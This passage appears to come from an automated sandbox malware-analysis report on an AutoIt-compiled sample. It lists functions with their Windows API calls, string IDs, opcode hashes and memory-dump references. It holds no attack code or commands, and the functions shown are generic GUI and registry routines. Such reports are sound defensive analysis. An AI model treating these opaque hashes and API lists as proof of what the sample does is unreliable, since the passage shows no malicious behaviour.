                                    • Opcode Fuzzy Hash: d1dd5225c4c5821144de2e0b4bc65c05700ed587e6f057c2e7adee0c180e72ce
                                    • Instruction Fuzzy Hash: 0A513A71900208BFDF14AFA8EC48EAE7B79FF08324F114615F915AB2A1E7759A80CF50
                                    Function 0019B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0019B7B0
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0019B7C1
                                    • CharNextW.USER32(0000014E), ref: 0019B7F0
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0019B831
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0019B847
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0019B858
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0019B875
                                    • SetWindowTextW.USER32(?,0000014E), ref: 0019B8C7
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0019B8DD
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0019B90E
                                    • _memset.LIBCMT ref: 0019B933
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0019B97C
                                    • _memset.LIBCMT ref: 0019B9DB
                                    • SendMessageW.USER32 ref: 0019BA05
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0019BA5D
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0019BB0A
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0019BB2C
                                    • GetMenuItemInfoW.USER32(?), ref: 0019BB76
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0019BBA3
                                    • DrawMenuBar.USER32(?), ref: 0019BBB2
                                    • SetWindowTextW.USER32(?,0000014E), ref: 0019BBDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: 15f852ce74e9b772b9190ddc716a9a443d0b8186789aeaca0886f80229e85b97
                                    • Instruction ID: 98b705815caaf42b261812ed9f2113853615cbe5ce18084d856daf84bab0ec6c
                                    • Opcode Fuzzy Hash: 15f852ce74e9b772b9190ddc716a9a443d0b8186789aeaca0886f80229e85b97
                                    • Instruction Fuzzy Hash: 06E1AE75904208EBDF249FA1EDC4EEE7B78FF05714F10825AF919AA290D7708A81CF60
                                    Function 0019764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 0019778A
                                    • GetDesktopWindow.USER32 ref: 0019779F
                                    • GetWindowRect.USER32(00000000), ref: 001977A6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00197808
                                    • DestroyWindow.USER32(?), ref: 00197834
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0019785D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019787B
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001978A1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 001978B6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001978C9
                                    • IsWindowVisible.USER32(?), ref: 001978E9
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00197904
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00197918
                                    • GetWindowRect.USER32(?,?), ref: 00197930
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00197956
                                    • GetMonitorInfoW.USER32 ref: 00197970
                                    • CopyRect.USER32(?,?), ref: 00197987
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 001979F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: bb55797cd801be605ed661822b30b5032b464baced92e8652ad45a7670ef851b
                                    • Instruction ID: 7b1fb5062fabeae2840fc193c00c28b05d5536185c6ff2cb22c586a2ae46e284
                                    • Opcode Fuzzy Hash: bb55797cd801be605ed661822b30b5032b464baced92e8652ad45a7670ef851b
                                    • Instruction Fuzzy Hash: B6B1A071618301AFDB08DF64D989B6EBBE5FF88314F008A1DF5999B291D770E844CB92
                                    Function 0014A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0014A939
                                    • GetSystemMetrics.USER32(00000007), ref: 0014A941
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0014A96C
                                    • GetSystemMetrics.USER32(00000008), ref: 0014A974
                                    • GetSystemMetrics.USER32(00000004), ref: 0014A999
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0014A9B6
                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0014A9C6
                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0014A9F9
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0014AA0D
                                    • GetClientRect.USER32(00000000,000000FF), ref: 0014AA2B
                                    • GetStockObject.GDI32(00000011), ref: 0014AA47
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0014AA52
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • SetTimer.USER32(00000000,00000000,00000028,0014AB87), ref: 0014AA79
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: 6e40393a5195f1ac908e64be7ccf5ac67af8515ebf12d6eb5a523d6ec7fc82e4
                                    • Instruction ID: 4c3097249f951b9ed406cd05b88feb8623916459ad0033e25027c04dcf241bb8
                                    • Opcode Fuzzy Hash: 6e40393a5195f1ac908e64be7ccf5ac67af8515ebf12d6eb5a523d6ec7fc82e4
                                    • Instruction Fuzzy Hash: CAB14C7564020AAFDB18DFA8DC45BAE7BB4FF08325F124219FA15E72A0DB74D840CB51
                                    Function 00176CE9 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 178COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 3483108802-1459072770
                                    • Opcode ID: 7f63bc7a0107d55926675a972183e0180affdc83d513ed21de4fa60142a3ca21
                                    • Instruction ID: 6adeaaaa4bea3680f26df0c656c4cf6d0365350c5f6b36bb02752cf87aa47e8d
                                    • Opcode Fuzzy Hash: 7f63bc7a0107d55926675a972183e0180affdc83d513ed21de4fa60142a3ca21
                                    • Instruction Fuzzy Hash: F8410272A00200BBEB05ABA4DC47EBF777CDF65710F04406DFD15AA182EF749A0596A1
                                    Function 00132EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Foreground
                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                    • API String ID: 62970417-1919597938
                                    • Opcode ID: 57227abdbba11a09a1d622315068ae9882cb11666290bd9e935556091208e317
                                    • Instruction ID: aa87827816511b1bc178516e3eb289b248a7a1ed3ec8fd071576f0044cc14207
                                    • Opcode Fuzzy Hash: 57227abdbba11a09a1d622315068ae9882cb11666290bd9e935556091208e317
                                    • Instruction Fuzzy Hash: 92D1FB30504742EBCB08EF24C981AAEFBB4FF66344F104A1DF459675A1DB70E99ACB91
                                    Function 00193639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00193735
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,001CDC00,00000000,?,00000000,?,?), ref: 001937A3
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 001937EB
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00193874
                                    • RegCloseKey.ADVAPI32(?), ref: 00193B94
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00193BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 1a73963fd2ac9e335adb26e60c2a1c362a2c888973b43bf90b45146ce52280c9
                                    • Instruction ID: 9419fed8ebcaa4aebd598afe09c647237c699ad2a853cf810f833b42eb438f9c
                                    • Opcode Fuzzy Hash: 1a73963fd2ac9e335adb26e60c2a1c362a2c888973b43bf90b45146ce52280c9
                                    • Instruction Fuzzy Hash: 430278756046019FCB14EF24C895A2EB7E5FF99720F04855DF99A9B3A2CB30ED41CB82
                                    Function 00196BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00196C56
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00196D16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: ad16de5f84a9aa78c128306cb92e4ef169f716f03a3043d2ed9153542a6d779a
                                    • Instruction ID: 43a6cb1d9d854e6d138d6dcc5e9e7df2f5d1a3ed23a09094161172d685054cea
                                    • Opcode Fuzzy Hash: ad16de5f84a9aa78c128306cb92e4ef169f716f03a3043d2ed9153542a6d779a
                                    • Instruction Fuzzy Hash: 65A181306043419FCB18EF20D991A6EB3E5BF65314F11496DB8AAAB3D2DB30ED05CB61
                                    Function 0016CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016CF91
                                    • __swprintf.LIBCMT ref: 0016D032
                                    • _wcscmp.LIBCMT ref: 0016D045
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0016D09A
                                    • _wcscmp.LIBCMT ref: 0016D0D6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 0016D10D
                                    • GetDlgCtrlID.USER32(?), ref: 0016D15F
                                    • GetWindowRect.USER32(?,?), ref: 0016D195
                                    • GetParent.USER32(?), ref: 0016D1B3
                                    • ScreenToClient.USER32(00000000), ref: 0016D1BA
                                    • GetClassNameW.USER32(?,?,00000100), ref: 0016D234
                                    • _wcscmp.LIBCMT ref: 0016D248
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0016D26E
                                    • _wcscmp.LIBCMT ref: 0016D282
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                    • String ID: %s%u
                                    • API String ID: 3119225716-679674701
                                    • Opcode ID: b0ee9644f9815f7946eabc8f7481dc53a37290d6962b4e82419aef789ee6a0e7
                                    • Instruction ID: 46d3861e84ab778fb869359f6369e4929755d75631aa1ffc4a0423a3de97f341
                                    • Opcode Fuzzy Hash: b0ee9644f9815f7946eabc8f7481dc53a37290d6962b4e82419aef789ee6a0e7
                                    • Instruction Fuzzy Hash: 8FA1E271A04302AFC719DF64DC94FEAB7A8FF54354F008619F9A9D2180EB30E965CB91
                                    Function 0016D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0016D8EB
                                    • _wcscmp.LIBCMT ref: 0016D8FC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0016D924
                                    • CharUpperBuffW.USER32(?,00000000), ref: 0016D941
                                    • _wcscmp.LIBCMT ref: 0016D95F
                                    • _wcsstr.LIBCMT ref: 0016D970
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0016D9A8
                                    • _wcscmp.LIBCMT ref: 0016D9B8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0016D9DF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0016DA28
                                    • _wcscmp.LIBCMT ref: 0016DA38
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0016DA60
                                    • GetWindowRect.USER32(00000004,?), ref: 0016DAC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 849b2a7a5e150ff9ad1f077add3ce6beca0fb9d21bd4ae44f39866b7d1be1224
                                    • Instruction ID: 94860e244bfc40e82f3c607daa08c42596915c9bdeb0178e071128bbc75c612d
                                    • Opcode Fuzzy Hash: 849b2a7a5e150ff9ad1f077add3ce6beca0fb9d21bd4ae44f39866b7d1be1224
                                    • Instruction Fuzzy Hash: C881D0316083059FDB05CF50EC81FAA7BE8EF84318F04846AFD899A096EB30DD55CBA1
                                    Function 0016D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: 84e87ef73dd1e230dd81b7599478d6abc1cbcff177734b3fe18beefbc26b7d46
                                    • Instruction ID: a18aa20b0c664e5c52c501297a479ca8d337e8365bd81dbddaccbfb9fd1dc2a6
                                    • Opcode Fuzzy Hash: 84e87ef73dd1e230dd81b7599478d6abc1cbcff177734b3fe18beefbc26b7d46
                                    • Instruction Fuzzy Hash: 4031B031A44649E6DB14EA51ED63EEDB3BD9F30715F300029F851720D5EB61AE18C652
                                    Function 0016EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 0016EAB0
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0016EAC2
                                    • SetWindowTextW.USER32(?,?), ref: 0016EAD9
                                    • GetDlgItem.USER32(?,000003EA), ref: 0016EAEE
                                    • SetWindowTextW.USER32(00000000,?), ref: 0016EAF4
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EB04
                                    • SetWindowTextW.USER32(00000000,?), ref: 0016EB0A
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0016EB2B
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0016EB45
                                    • GetWindowRect.USER32(?,?), ref: 0016EB4E
                                    • SetWindowTextW.USER32(?,?), ref: 0016EBB9
                                    • GetDesktopWindow.USER32 ref: 0016EBBF
                                    • GetWindowRect.USER32(00000000), ref: 0016EBC6
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0016EC12
                                    • GetClientRect.USER32(?,?), ref: 0016EC1F
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0016EC44
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0016EC6F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 8d481142fd626ed2f6d3df54325713999f9ec0a05fdadaa8ea94204b7d0cbf89
                                    • Instruction ID: a2a19bd10952da104d2627cd0ee98a925720379f4d884c540e728576edc6f8c1
                                    • Opcode Fuzzy Hash: 8d481142fd626ed2f6d3df54325713999f9ec0a05fdadaa8ea94204b7d0cbf89
                                    • Instruction Fuzzy Hash: 2B513A75900709AFDB249FA8DD89F6EBBF5FF04705F004A28E686A29A0D774A954CF10
                                    Function 001879B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 001879C6
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001879D1
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 001879DC
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 001879E7
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 001879F2
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 001879FD
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00187A08
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00187A13
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00187A1E
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00187A29
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00187A34
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00187A3F
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00187A4A
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00187A55
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00187A60
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00187A6B
